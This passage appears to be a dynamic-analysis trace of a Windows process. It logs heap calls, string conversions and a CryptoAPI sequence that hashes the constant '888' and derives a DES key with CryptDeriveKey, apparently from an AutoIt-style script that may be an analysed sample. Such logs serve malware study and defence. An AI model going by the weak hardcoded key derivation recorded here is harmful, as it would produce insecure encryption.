lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.303] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0226.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0226.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.304] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51538 [0226.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51538, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0226.305] CryptHashData (hHash=0xa87090, pbData=0x2e55048, dwDataLen=0x3, dwFlags=0x1) returned 1 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.307] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0226.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51400 [0226.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51400, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0226.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.313] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0226.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0226.314] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87090, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 